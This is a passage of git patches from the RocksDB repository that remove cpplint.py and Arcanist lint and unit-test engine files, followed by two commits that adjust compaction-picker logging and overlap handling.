Match(r'(.+::)?[A-Z][A-Z0-9_]*', tok): continue - # A catch all for tricky sizeof cases, including 'sizeof expression', - # 'sizeof(*type)', 'sizeof(const type)', 'sizeof(struct StructName)' - # requires skipping the next token because we split on ' ' and '*'. - if tok.startswith('sizeof'): - skip_next = True - continue - is_const = False - break - if not is_const: - error(filename, linenum, 'runtime/arrays', 1, - 'Do not use variable-length arrays. Use an appropriately named ' - "('k' followed by CamelCase) compile-time constant for the size.") - - # If DISALLOW_EVIL_CONSTRUCTORS, DISALLOW_COPY_AND_ASSIGN, or - # DISALLOW_IMPLICIT_CONSTRUCTORS is present, then it should be the last thing - # in the class declaration. - match = Match( - (r'\s*' - r'(DISALLOW_(EVIL_CONSTRUCTORS|COPY_AND_ASSIGN|IMPLICIT_CONSTRUCTORS))' - r'\(.*\);$'), - line) - if match and linenum + 1 < clean_lines.NumLines(): - next_line = clean_lines.elided[linenum + 1] - # We allow some, but not all, declarations of variables to be present - # in the statement that defines the class. The [\w\*,\s]* fragment of - # the regular expression below allows users to declare instances of - # the class or pointers to instances, but not less common types such - # as function pointers or arrays. It's a tradeoff between allowing - # reasonable code and avoiding trying to parse more C++ using regexps. - if not Search(r'^\s*}[\w\*,\s]*;', next_line): - error(filename, linenum, 'readability/constructors', 3, - match.group(1) + ' should be the last thing in the class') - - # Check for use of unnamed namespaces in header files. Registration - # macros are typically OK, so we allow use of "namespace {" on lines - # that end with backslashes. - if (file_extension == 'h' - and Search(r'\bnamespace\s*{', line) - and line[-1] != '\\'): - error(filename, linenum, 'build/namespaces', 4, - 'Do not use unnamed namespaces in header files. See ' - 'http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Namespaces' - ' for more information.') - -def CheckForNonConstReference(filename, clean_lines, linenum, - nesting_state, error): - """Check for non-const references. - - Separate from CheckLanguage since it scans backwards from current - line, instead of scanning forward. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - # Do nothing if there is no '&' on current line. - line = clean_lines.elided[linenum] - if '&' not in line: - return - - # Long type names may be broken across multiple lines, usually in one - # of these forms: - # LongType - # ::LongTypeContinued &identifier - # LongType:: - # LongTypeContinued &identifier - # LongType< - # ...>::LongTypeContinued &identifier - # - # If we detected a type split across two lines, join the previous - # line to current line so that we can match const references - # accordingly. - # - # Note that this only scans back one line, since scanning back - # arbitrary number of lines would be expensive. If you have a type - # that spans more than 2 lines, please use a typedef. - if linenum > 1: - previous = None - if Match(r'\s*::(?:[\w<>]|::)+\s*&\s*\S', line): - # previous_line\n + ::current_line - previous = Search(r'\b((?:const\s*)?(?:[\w<>]|::)+[\w<>])\s*$', - clean_lines.elided[linenum - 1]) - elif Match(r'\s*[a-zA-Z_]([\w<>]|::)+\s*&\s*\S', line): - # previous_line::\n + current_line - previous = Search(r'\b((?:const\s*)?(?:[\w<>]|::)+::)\s*$', - clean_lines.elided[linenum - 1]) - if previous: - line = previous.group(1) + line.lstrip() - else: - # Check for templated parameter that is split across multiple lines - endpos = line.rfind('>') - if endpos > -1: - (_, startline, startpos) = ReverseCloseExpression( - clean_lines, linenum, endpos) - if startpos > -1 and startline < linenum: - # Found the matching < on an earlier line, collect all - # pieces up to current line. - line = '' - for i in xrange(startline, linenum + 1): - line += clean_lines.elided[i].strip() - - # Check for non-const references in function parameters. A single '&' may - # found in the following places: - # inside expression: binary & for bitwise AND - # inside expression: unary & for taking the address of something - # inside declarators: reference parameter - # We will exclude the first two cases by checking that we are not inside a - # function body, including one that was just introduced by a trailing '{'. - # TODO(unknwon): Doesn't account for preprocessor directives. - # TODO(unknown): Doesn't account for 'catch(Exception& e)' [rare]. - check_params = False - if not nesting_state.stack: - check_params = True # top level - elif (isinstance(nesting_state.stack[-1], _ClassInfo) or - isinstance(nesting_state.stack[-1], _NamespaceInfo)): - check_params = True # within class or namespace - elif Match(r'.*{\s*$', line): - if (len(nesting_state.stack) == 1 or - isinstance(nesting_state.stack[-2], _ClassInfo) or - isinstance(nesting_state.stack[-2], _NamespaceInfo)): - check_params = True # just opened global/class/namespace block - # We allow non-const references in a few standard places, like functions - # called "swap()" or iostream operators like "<<" or ">>". Do not check - # those function parameters. - # - # We also accept & in static_assert, which looks like a function but - # it's actually a declaration expression. - whitelisted_functions = (r'(?:[sS]wap(?:<\w:+>)?|' - r'operator\s*[<>][<>]|' - r'static_assert|COMPILE_ASSERT' - r')\s*\(') - if Search(whitelisted_functions, line): - check_params = False - elif not Search(r'\S+\([^)]*$', line): - # Don't see a whitelisted function on this line. Actually we - # didn't see any function name on this line, so this is likely a - # multi-line parameter list. Try a bit harder to catch this case. - for i in xrange(2): - if (linenum > i and - Search(whitelisted_functions, clean_lines.elided[linenum - i - 1])): - check_params = False - break - - if check_params: - decls = ReplaceAll(r'{[^}]*}', ' ', line) # exclude function body - for parameter in re.findall(_RE_PATTERN_REF_PARAM, decls): - if not Match(_RE_PATTERN_CONST_REF_PARAM, parameter): - error(filename, linenum, 'runtime/references', 2, - 'Is this a non-const reference? ' - 'If so, make const or use a pointer: ' + - ReplaceAll(' *<', '<', parameter)) - - -def CheckCStyleCast(filename, linenum, line, raw_line, cast_type, pattern, - error): - """Checks for a C-style cast by looking for the pattern. - - Args: - filename: The name of the current file. - linenum: The number of the line to check. - line: The line of code to check. - raw_line: The raw line of code to check, with comments. - cast_type: The string for the C++ cast to recommend. This is either - reinterpret_cast, static_cast, or const_cast, depending. - pattern: The regular expression used to find C-style casts. - error: The function to call with any errors found. - - Returns: - True if an error was emitted. - False otherwise. - """ - match = Search(pattern, line) - if not match: - return False - - # Exclude lines with sizeof, since sizeof looks like a cast. - sizeof_match = Match(r'.*sizeof\s*$', line[0:match.start(1) - 1]) - if sizeof_match: - return False - - # operator++(int) and operator--(int) - if (line[0:match.start(1) - 1].endswith(' operator++') or - line[0:match.start(1) - 1].endswith(' operator--')): - return False - - # A single unnamed argument for a function tends to look like old - # style cast. If we see those, don't issue warnings for deprecated - # casts, instead issue warnings for unnamed arguments where - # appropriate. - # - # These are things that we want warnings for, since the style guide - # explicitly require all parameters to be named: - # Function(int); - # Function(int) { - # ConstMember(int) const; - # ConstMember(int) const { - # ExceptionMember(int) throw (...); - # ExceptionMember(int) throw (...) { - # PureVirtual(int) = 0; - # - # These are functions of some sort, where the compiler would be fine - # if they had named parameters, but people often omit those - # identifiers to reduce clutter: - # (FunctionPointer)(int); - # (FunctionPointer)(int) = value; - # Function((function_pointer_arg)(int)) - # ; - # <(FunctionPointerTemplateArgument)(int)>; - remainder = line[match.end(0):] - if Match(r'^\s*(?:;|const\b|throw\b|=|>|\{|\))', remainder): - # Looks like an unnamed parameter. - - # Don't warn on any kind of template arguments. - if Match(r'^\s*>', remainder): - return False - - # Don't warn on assignments to function pointers, but keep warnings for - # unnamed parameters to pure virtual functions. Note that this pattern - # will also pass on assignments of "0" to function pointers, but the - # preferred values for those would be "nullptr" or "NULL". - matched_zero = Match(r'^\s=\s*(\S+)\s*;', remainder) - if matched_zero and matched_zero.group(1) != '0': - return False - - # Don't warn on function pointer declarations. For this we need - # to check what came before the "(type)" string. - if Match(r'.*\)\s*$', line[0:match.start(0)]): - return False - - # Don't warn if the parameter is named with block comments, e.g.: - # Function(int /*unused_param*/); - if '/*' in raw_line: - return False - - # Passed all filters, issue warning here. - error(filename, linenum, 'readability/function', 3, - 'All parameters should be named in a function') - return True - - # At this point, all that should be left is actual casts. - error(filename, linenum, 'readability/casting', 4, - 'Using C-style cast. Use %s<%s>(...) instead' % - (cast_type, match.group(1))) - - return True - - -_HEADERS_CONTAINING_TEMPLATES = ( - ('', ('deque',)), - ('', ('unary_function', 'binary_function', - 'plus', 'minus', 'multiplies', 'divides', 'modulus', - 'negate', - 'equal_to', 'not_equal_to', 'greater', 'less', - 'greater_equal', 'less_equal', - 'logical_and', 'logical_or', 'logical_not', - 'unary_negate', 'not1', 'binary_negate', 'not2', - 'bind1st', 'bind2nd', - 'pointer_to_unary_function', - 'pointer_to_binary_function', - 'ptr_fun', - 'mem_fun_t', 'mem_fun', 'mem_fun1_t', 'mem_fun1_ref_t', - 'mem_fun_ref_t', - 'const_mem_fun_t', 'const_mem_fun1_t', - 'const_mem_fun_ref_t', 'const_mem_fun1_ref_t', - 'mem_fun_ref', - )), - ('', ('numeric_limits',)), - ('', ('list',)), - ('', ('map', 'multimap',)), - ('', ('allocator',)), - ('', ('queue', 'priority_queue',)), - ('', ('set', 'multiset',)), - ('', ('stack',)), - ('', ('char_traits', 'basic_string',)), - ('', ('pair',)), - ('', ('vector',)), - - # gcc extensions. - # Note: std::hash is their hash, ::hash is our hash - ('', ('hash_map', 'hash_multimap',)), - ('', ('hash_set', 'hash_multiset',)), - ('', ('slist',)), - ) - -_RE_PATTERN_STRING = re.compile(r'\bstring\b') - -_re_pattern_algorithm_header = [] -for _template in ('copy', 'max', 'min', 'min_element', 'sort', 'swap', - 'transform'): - # Match max(..., ...), max(..., ...), but not foo->max, foo.max or - # type::max(). - _re_pattern_algorithm_header.append( - (re.compile(r'[^>.]\b' + _template + r'(<.*?>)?\([^\)]'), - _template, - '')) - -_re_pattern_templates = [] -for _header, _templates in _HEADERS_CONTAINING_TEMPLATES: - for _template in _templates: - _re_pattern_templates.append( - (re.compile(r'(\<|\b)' + _template + r'\s*\<'), - _template + '<>', - _header)) - - -def FilesBelongToSameModule(filename_cc, filename_h): - """Check if these two filenames belong to the same module. - - The concept of a 'module' here is a as follows: - foo.h, foo-inl.h, foo.cc, foo_test.cc and foo_unittest.cc belong to the - same 'module' if they are in the same directory. - some/path/public/xyzzy and some/path/internal/xyzzy are also considered - to belong to the same module here. - - If the filename_cc contains a longer path than the filename_h, for example, - '/absolute/path/to/base/sysinfo.cc', and this file would include - 'base/sysinfo.h', this function also produces the prefix needed to open the - header. This is used by the caller of this function to more robustly open the - header file. We don't have access to the real include paths in this context, - so we need this guesswork here. - - Known bugs: tools/base/bar.cc and base/bar.h belong to the same module - according to this implementation. Because of this, this function gives - some false positives. This should be sufficiently rare in practice. - - Args: - filename_cc: is the path for the .cc file - filename_h: is the path for the header path - - Returns: - Tuple with a bool and a string: - bool: True if filename_cc and filename_h belong to the same module. - string: the additional prefix needed to open the header file. - """ - - if not filename_cc.endswith('.cc'): - return (False, '') - filename_cc = filename_cc[:-len('.cc')] - if filename_cc.endswith('_unittest'): - filename_cc = filename_cc[:-len('_unittest')] - elif filename_cc.endswith('_test'): - filename_cc = filename_cc[:-len('_test')] - filename_cc = filename_cc.replace('/public/', '/') - filename_cc = filename_cc.replace('/internal/', '/') - - if not filename_h.endswith('.h'): - return (False, '') - filename_h = filename_h[:-len('.h')] - if filename_h.endswith('-inl'): - filename_h = filename_h[:-len('-inl')] - filename_h = filename_h.replace('/public/', '/') - filename_h = filename_h.replace('/internal/', '/') - - files_belong_to_same_module = filename_cc.endswith(filename_h) - common_path = '' - if files_belong_to_same_module: - common_path = filename_cc[:-len(filename_h)] - return files_belong_to_same_module, common_path - - -def UpdateIncludeState(filename, include_state, io=codecs): - """Fill up the include_state with new includes found from the file. - - Args: - filename: the name of the header to read. - include_state: an _IncludeState instance in which the headers are inserted. - io: The io factory to use to read the file. Provided for testability. - - Returns: - True if a header was successfully added. False otherwise. - """ - headerfile = None - try: - headerfile = io.open(filename, 'r', 'utf8', 'replace') - except IOError: - return False - linenum = 0 - for line in headerfile: - linenum += 1 - clean_line = CleanseComments(line) - match = _RE_PATTERN_INCLUDE.search(clean_line) - if match: - include = match.group(2) - # The value formatting is cute, but not really used right now. - # What matters here is that the key is in include_state. - include_state.setdefault(include, '%s:%d' % (filename, linenum)) - return True - - -def CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error, - io=codecs): - """Reports for missing stl includes. - - This function will output warnings to make sure you are including the headers - necessary for the stl containers and functions that you use. We only give one - reason to include a header. For example, if you use both equal_to<> and - less<> in a .h file, only one (the latter in the file) of these will be - reported as a reason to include the . - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - include_state: An _IncludeState instance. - error: The function to call with any errors found. - io: The IO factory to use to read the header file. Provided for unittest - injection. - """ - required = {} # A map of header name to linenumber and the template entity. - # Example of required: { '': (1219, 'less<>') } - - for linenum in xrange(clean_lines.NumLines()): - line = clean_lines.elided[linenum] - if not line or line[0] == '#': - continue - - # String is special -- it is a non-templatized type in STL. - matched = _RE_PATTERN_STRING.search(line) - if matched: - # Don't warn about strings in non-STL namespaces: - # (We check only the first match per line; good enough.) - prefix = line[:matched.start()] - if prefix.endswith('std::') or not prefix.endswith('::'): - required[''] = (linenum, 'string') - - for pattern, template, header in _re_pattern_algorithm_header: - if pattern.search(line): - required[header] = (linenum, template) - - # The following function is just a speed up, no semantics are changed. - if not '<' in line: # Reduces the cpu time usage by skipping lines. - continue - - for pattern, template, header in _re_pattern_templates: - if pattern.search(line): - required[header] = (linenum, template) - - # The policy is that if you #include something in foo.h you don't need to - # include it again in foo.cc. Here, we will look at possible includes. - # Let's copy the include_state so it is only messed up within this function. - include_state = include_state.copy() - - # Did we find the header for this file (if any) and successfully load it? - header_found = False - - # Use the absolute path so that matching works properly. - abs_filename = FileInfo(filename).FullName() - - # For Emacs's flymake. - # If cpplint is invoked from Emacs's flymake, a temporary file is generated - # by flymake and that file name might end with '_flymake.cc'. In that case, - # restore original file name here so that the corresponding header file can be - # found. - # e.g. If the file name is 'foo_flymake.cc', we should search for 'foo.h' - # instead of 'foo_flymake.h' - abs_filename = re.sub(r'_flymake\.cc$', '.cc', abs_filename) - - # include_state is modified during iteration, so we iterate over a copy of - # the keys. - header_keys = include_state.keys() - for header in header_keys: - (same_module, common_path) = FilesBelongToSameModule(abs_filename, header) - fullpath = common_path + header - if same_module and UpdateIncludeState(fullpath, include_state, io): - header_found = True - - # If we can't find the header file for a .cc, assume it's because we don't - # know where to look. In that case we'll give up as we're not sure they - # didn't include it in the .h file. - # TODO(unknown): Do a better job of finding .h files so we are confident that - # not having the .h file means there isn't one. - if filename.endswith('.cc') and not header_found: - return - - # All the lines have been processed, report the errors found. - for required_header_unstripped in required: - template = required[required_header_unstripped][1] - if required_header_unstripped.strip('<>"') not in include_state: - error(filename, required[required_header_unstripped][0], - 'build/include_what_you_use', 4, - 'Add #include ' + required_header_unstripped + ' for ' + template) - - -_RE_PATTERN_EXPLICIT_MAKEPAIR = re.compile(r'\bmake_pair\s*<') - - -def CheckMakePairUsesDeduction(filename, clean_lines, linenum, error): - """Check that make_pair's template arguments are deduced. - - G++ 4.6 in C++0x mode fails badly if make_pair's template arguments are - specified explicitly, and such use isn't intended in any case. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - match = _RE_PATTERN_EXPLICIT_MAKEPAIR.search(line) - if match: - error(filename, linenum, 'build/explicit_make_pair', - 4, # 4 = high confidence - 'For C++11-compatibility, omit template arguments from make_pair' - ' OR use pair directly OR if appropriate, construct a pair directly') - - -def ProcessLine(filename, file_extension, clean_lines, line, - include_state, function_state, nesting_state, error, - extra_check_functions=[]): - """Processes a single line in the file. - - Args: - filename: Filename of the file that is being processed. - file_extension: The extension (dot not included) of the file. - clean_lines: An array of strings, each representing a line of the file, - with comments stripped. - line: Number of line being processed. - include_state: An _IncludeState instance in which the headers are inserted. - function_state: A _FunctionState instance which counts function lines, etc. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: A callable to which errors are reported, which takes 4 arguments: - filename, line number, error level, and message - extra_check_functions: An array of additional check functions that will be - run on each source line. Each function takes 4 - arguments: filename, clean_lines, line, error - """ - raw_lines = clean_lines.raw_lines - ParseNolintSuppressions(filename, raw_lines[line], line, error) - nesting_state.Update(filename, clean_lines, line, error) - if nesting_state.stack and nesting_state.stack[-1].inline_asm != _NO_ASM: - return - CheckForFunctionLengths(filename, clean_lines, line, function_state, error) - CheckForMultilineCommentsAndStrings(filename, clean_lines, line, error) - CheckStyle(filename, clean_lines, line, file_extension, nesting_state, error) - CheckLanguage(filename, clean_lines, line, file_extension, include_state, - nesting_state, error) - CheckForNonConstReference(filename, clean_lines, line, nesting_state, error) - CheckForNonStandardConstructs(filename, clean_lines, line, - nesting_state, error) - CheckVlogArguments(filename, clean_lines, line, error) - CheckPosixThreading(filename, clean_lines, line, error) - CheckInvalidIncrement(filename, clean_lines, line, error) - CheckMakePairUsesDeduction(filename, clean_lines, line, error) - for check_fn in extra_check_functions: - check_fn(filename, clean_lines, line, error) - -def ProcessFileData(filename, file_extension, lines, error, - extra_check_functions=[]): - """Performs lint checks and reports any errors to the given error function. - - Args: - filename: Filename of the file that is being processed. - file_extension: The extension (dot not included) of the file. - lines: An array of strings, each representing a line of the file, with the - last element being empty if the file is terminated with a newline. - error: A callable to which errors are reported, which takes 4 arguments: - filename, line number, error level, and message - extra_check_functions: An array of additional check functions that will be - run on each source line. Each function takes 4 - arguments: filename, clean_lines, line, error - """ - lines = (['// marker so line numbers and indices both start at 1'] + lines + - ['// marker so line numbers end in a known way']) - - include_state = _IncludeState() - function_state = _FunctionState() - nesting_state = _NestingState() - - ResetNolintSuppressions() - - CheckForCopyright(filename, lines, error) - - if file_extension == 'h': - CheckForHeaderGuard(filename, lines, error) - - RemoveMultiLineComments(filename, lines, error) - clean_lines = CleansedLines(lines) - for line in xrange(clean_lines.NumLines()): - ProcessLine(filename, file_extension, clean_lines, line, - include_state, function_state, nesting_state, error, - extra_check_functions) - nesting_state.CheckCompletedBlocks(filename, error) - - CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error) - - # We check here rather than inside ProcessLine so that we see raw - # lines rather than "cleaned" lines. - CheckForBadCharacters(filename, lines, error) - - CheckForNewlineAtEOF(filename, lines, error) - -def ProcessFile(filename, vlevel, extra_check_functions=[]): - """Does google-lint on a single file. - - Args: - filename: The name of the file to parse. - - vlevel: The level of errors to report. Every error of confidence - >= verbose_level will be reported. 0 is a good default. - - extra_check_functions: An array of additional check functions that will be - run on each source line. Each function takes 4 - arguments: filename, clean_lines, line, error - """ - - _SetVerboseLevel(vlevel) - - try: - # Support the UNIX convention of using "-" for stdin. Note that - # we are not opening the file with universal newline support - # (which codecs doesn't support anyway), so the resulting lines do - # contain trailing '\r' characters if we are reading a file that - # has CRLF endings. - # If after the split a trailing '\r' is present, it is removed - # below. If it is not expected to be present (i.e. os.linesep != - # '\r\n' as in Windows), a warning is issued below if this file - # is processed. - - if filename == '-': - lines = codecs.StreamReaderWriter(sys.stdin, - codecs.getreader('utf8'), - codecs.getwriter('utf8'), - 'replace').read().split('\n') - else: - lines = codecs.open(filename, 'r', 'utf8', 'replace').read().split('\n') - - carriage_return_found = False - # Remove trailing '\r'. - for linenum in range(len(lines)): - if lines[linenum].endswith('\r'): - lines[linenum] = lines[linenum].rstrip('\r') - carriage_return_found = True - - except IOError: - sys.stderr.write( - "Skipping input '%s': Can't open for reading\n" % filename) - return - - # Note, if no dot is found, this will give the entire filename as the ext. - file_extension = filename[filename.rfind('.') + 1:] - - # When reading from stdin, the extension is unknown, so no cpplint tests - # should rely on the extension. - if filename != '-' and file_extension not in _valid_extensions: - sys.stderr.write('Ignoring %s; not a valid file name ' - '(%s)\n' % (filename, ', '.join(_valid_extensions))) - else: - ProcessFileData(filename, file_extension, lines, Error, - extra_check_functions) - if carriage_return_found and os.linesep != '\r\n': - # Use 0 for linenum since outputting only one error for potentially - # several lines. - Error(filename, 0, 'whitespace/newline', 1, - 'One or more unexpected \\r (^M) found;' - 'better to use only a \\n') - - sys.stderr.write('Done processing %s\n' % filename) - - -def PrintUsage(message): - """Prints a brief usage string and exits, optionally with an error message. - - Args: - message: The optional error message. - """ - sys.stderr.write(_USAGE) - if message: - sys.exit('\nFATAL ERROR: ' + message) - else: - sys.exit(1) - - -def PrintCategories(): - """Prints a list of all the error-categories used by error messages. - - These are the categories used to filter messages via --filter. - """ - sys.stderr.write(''.join(' %s\n' % cat for cat in _ERROR_CATEGORIES)) - sys.exit(0) - - -def ParseArguments(args): - """Parses the command line arguments. - - This may set the output format and verbosity level as side-effects. - - Args: - args: The command line arguments: - - Returns: - The list of filenames to lint. - """ - try: - (opts, filenames) = getopt.getopt(args, '', ['help', 'output=', 'verbose=', - 'counting=', - 'filter=', - 'root=', - 'linelength=', - 'extensions=']) - except getopt.GetoptError: - PrintUsage('Invalid arguments.') - - verbosity = _VerboseLevel() - output_format = _OutputFormat() - filters = '' - counting_style = '' - - for (opt, val) in opts: - if opt == '--help': - PrintUsage(None) - elif opt == '--output': - if val not in ('emacs', 'vs7', 'eclipse'): - PrintUsage('The only allowed output formats are emacs, vs7 and eclipse.') - output_format = val - elif opt == '--verbose': - verbosity = int(val) - elif opt == '--filter': - filters = val - if not filters: - PrintCategories() - elif opt == '--counting': - if val not in ('total', 'toplevel', 'detailed'): - PrintUsage('Valid counting options are total, toplevel, and detailed') - counting_style = val - elif opt == '--root': - global _root - _root = val - elif opt == '--linelength': - global _line_length - try: - _line_length = int(val) - except ValueError: - PrintUsage('Line length must be digits.') - elif opt == '--extensions': - global _valid_extensions - try: - _valid_extensions = set(val.split(',')) - except ValueError: - PrintUsage('Extensions must be comma separated list.') - - if not filenames: - PrintUsage('No files were specified.') - - _SetOutputFormat(output_format) - _SetVerboseLevel(verbosity) - _SetFilters(filters) - _SetCountingStyle(counting_style) - - return filenames - - -def main(): - filenames = ParseArguments(sys.argv[1:]) - - # Change stderr to write with replacement characters so we don't die - # if we try to print something containing non-ASCII characters. - sys.stderr = codecs.StreamReaderWriter(sys.stderr, - codecs.getreader('utf8'), - codecs.getwriter('utf8'), - 'replace') - - _cpplint_state.ResetErrorCounts() - for filename in filenames: - ProcessFile(filename, _cpplint_state.verbose_level) - _cpplint_state.PrintErrorCounts() - - sys.exit(_cpplint_state.error_count > 0) - - -if __name__ == '__main__': - main() diff --git a/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php b/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php deleted file mode 100644 index 88b0748f7d5..00000000000 --- a/arcanist_util/lint_engine/FacebookFbcodeLintEngine.php +++ /dev/null @@ -1,138 +0,0 @@ -getPaths(); - - // Remove all deleted files, which are not checked by the - // following linters. - foreach ($paths as $key => $path) { - if (!Filesystem::pathExists($this->getFilePathOnDisk($path))) { - unset($paths[$key]); - } - } - - $generated_linter = new ArcanistGeneratedLinter(); - $linters[] = $generated_linter; - - $nolint_linter = new ArcanistNoLintLinter(); - $linters[] = $nolint_linter; - - $text_linter = new ArcanistTextLinter(); - $text_linter->setCustomSeverityMap(array( - ArcanistTextLinter::LINT_LINE_WRAP - => ArcanistLintSeverity::SEVERITY_ADVICE, - )); - $linters[] = $text_linter; - - $java_text_linter = new ArcanistTextLinter(); - $java_text_linter->setMaxLineLength(100); - $java_text_linter->setCustomSeverityMap(array( - ArcanistTextLinter::LINT_LINE_WRAP - => ArcanistLintSeverity::SEVERITY_ADVICE, - )); - $linters[] = $java_text_linter; - - $python_linter = new ArcanistPEP8Linter(); - $linters[] = $python_linter; - - $cpp_linters = array(); - $cpp_linters[] = $linters[] = new ArcanistCpplintLinter(); - $cpp_linters[] = $linters[] = new FbcodeCppLinter(); - - $clang_format_linter = new FbcodeClangFormatLinter(); - $linters[] = $clang_format_linter; - - $spelling_linter = new ArcanistSpellingLinter(); - $linters[] = $spelling_linter; - - foreach ($paths as $path) { - $is_text = false; - - $text_extensions = ( - '/\.('. - 'cpp|cxx|c|cc|h|hpp|hxx|tcc|'. - 'py|rb|hs|pl|pm|tw|'. - 'php|phpt|css|js|'. - 'java|'. - 'thrift|'. - 'lua|'. - 'siv|'. - 'txt'. - ')$/' - ); - if (preg_match($text_extensions, $path)) { - $is_text = true; - } - if ($is_text) { - $nolint_linter->addPath($path); - - $generated_linter->addPath($path); - $generated_linter->addData($path, $this->loadData($path)); - - if (preg_match('/\.java$/', $path)) { - $java_text_linter->addPath($path); - $java_text_linter->addData($path, $this->loadData($path)); - } else { - $text_linter->addPath($path); - $text_linter->addData($path, $this->loadData($path)); - } - - $spelling_linter->addPath($path); - $spelling_linter->addData($path, $this->loadData($path)); - } - if (preg_match('/\.(cpp|c|cc|cxx|h|hh|hpp|hxx|tcc)$/', $path) - && !preg_match('/third-party/', $path)) { - foreach ($cpp_linters as &$linter) { - $linter->addPath($path); - $linter->addData($path, $this->loadData($path)); - } - - $clang_format_linter->addPath($path); - $clang_format_linter->addData($path, $this->loadData($path)); - $clang_format_linter->setPathChangedLines( - $path, $this->getPathChangedLines($path)); - } - - // Match *.py and contbuild config files - if (preg_match('/(\.(py|tw|smcprops)|^contbuild\/configs\/[^\/]*)$/', - $path)) { - $space_count = 4; - $real_path = $this->getFilePathOnDisk($path); - $dir = dirname($real_path); - do { - if (file_exists($dir.'/.python2space')) { - $space_count = 2; - break; - } - $dir = dirname($dir); - } while ($dir != '/' && $dir != '.'); - - $cur_path_linter = $python_linter; - $cur_path_linter->addPath($path); - $cur_path_linter->addData($path, $this->loadData($path)); - - if (preg_match('/\.tw$/', $path)) { - $cur_path_linter->setCustomSeverityMap(array( - 'E251' => ArcanistLintSeverity::SEVERITY_DISABLED, - )); - } - } - } - - $name_linter = new ArcanistFilenameLinter(); - $linters[] = $name_linter; - foreach ($paths as $path) { - $name_linter->addPath($path); - } - - return $linters; - } - -} diff --git a/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php b/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php deleted file mode 100644 index 2e0148141a9..00000000000 --- a/arcanist_util/lint_engine/FacebookHowtoevenLintEngine.php +++ /dev/null @@ -1,27 +0,0 @@ -getPaths() as $path) { - // Don't try to lint deleted files or changed directories. - if (!Filesystem::pathExists($path) || is_dir($path)) { - continue; - } - - if (preg_match('/\.(cpp|c|cc|cxx|h|hh|hpp|hxx|tcc)$/', $path)) { - $paths[] = $path; - } - } - - $howtoeven = new FacebookHowtoevenLinter(); - $howtoeven->setPaths($paths); - return array($howtoeven); - } -} diff --git a/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php b/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php deleted file mode 100644 index 62c275f6a94..00000000000 --- a/arcanist_util/unit_engine/FacebookFbcodeUnitTestEngine.php +++ /dev/null @@ -1,17 +0,0 @@ -setName("dummy_placeholder_entry"); - $result->setResult(ArcanistUnitTestResult::RESULT_PASS); - return array($result); - } -} diff --git a/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php b/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php deleted file mode 100644 index 985bd68fc26..00000000000 --- a/arcanist_util/unit_engine/FacebookOldFbcodeUnitTestEngine.php +++ /dev/null @@ -1,17 +0,0 @@ -setName("dummy_placeholder_entry"); - $result->setResult(ArcanistUnitTestResult::RESULT_PASS); - return array($result); - } -} From ffd2a2eefdc6ad4223dff57a4ae1735b701c198a Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 19 Jul 2017 20:26:46 -0700 Subject: [PATCH 019/205] delete ExpandInputsToCleanCut failure log Summary: I decided not even to keep it as an INFO-level log as it is too normal for compactions to be skipped due to locked input files. Removing logging here makes us consistent with how we treat locked files that weren't pulled in due to overlap. We may want some error handling on line 422, which should never happen when called by `LevelCompactionBuilder::PickCompaction`, as `SetupInitialFiles` skips compactions where overlap causes the output level to pull in locked files. Closes https://github.com/facebook/rocksdb/pull/2617 Differential Revision: D5458502 Pulled By: ajkr fbshipit-source-id: c2e5f867c0a77c1812ce4242ab3e085b3eee0bae --- db/compaction_picker.cc | 5 ----- 1 file changed, 5 deletions(-) diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 6795227b5c9..f06351c70ce 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -234,11 +234,6 @@ bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name, // If, after the expansion, there are files that are already under // compaction, then we must drop/cancel this compaction. if (AreFilesInCompaction(inputs->files)) { - ROCKS_LOG_WARN( - ioptions_.info_log, - "[%s] ExpandWhileOverlapping() failure because some of the necessary" - " compaction input files are currently being compacted.", - cf_name.c_str()); return false; } return true; From a22b9cc6fe2853f62672f35462226413a82af262 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 19 Jul 2017 20:33:52 -0700 Subject: [PATCH 020/205] overlapping endpoint fixes in level compaction picker Summary: This diff addresses two problems. Both problems cause us to miss scheduling desirable compactions. One side effect is compaction picking can spam logs, as there's no delay after failed attempts to pick compactions. 1. If a compaction pulled in a locked input-level file due to user-key overlap, we would not consider picking another file from the same input level. 2. If a compaction pulled in a locked output-level file due to user-key overlap, we would not consider picking any other compaction on any level. The code changes are dependent, which is why I solved both problems in a single diff. - Moved input-level `ExpandInputsToCleanCut` into the loop inside `PickFileToCompact`. This gives two benefits: (1) if it fails, we will try the next-largest file on the same input level; (2) we get the fully-expanded input-level key-range with which we can check for pending compactions in output level. - Added another call to `ExpandInputsToCleanCut` inside `PickFileToCompact`'s to check for compaction conflicts in output level. - Deleted call to `IsRangeInCompaction` in `PickFileToCompact`, as `ExpandInputsToCleanCut` also correctly handles the case where original output-level files (i.e., ones not pulled in due to user-key overlap) are pending compaction. Closes https://github.com/facebook/rocksdb/pull/2615 Differential Revision: D5454643 Pulled By: ajkr fbshipit-source-id: ea3fb5477d83e97148951af3fd4558d2039e9872 --- db/compaction_picker.cc | 42 +++++++++++++------- db/compaction_picker_test.cc | 74 ++++++++++++++++++++++++++++++++++++ 2 files changed, 103 insertions(+), 13 deletions(-) diff --git a/db/compaction_picker.cc 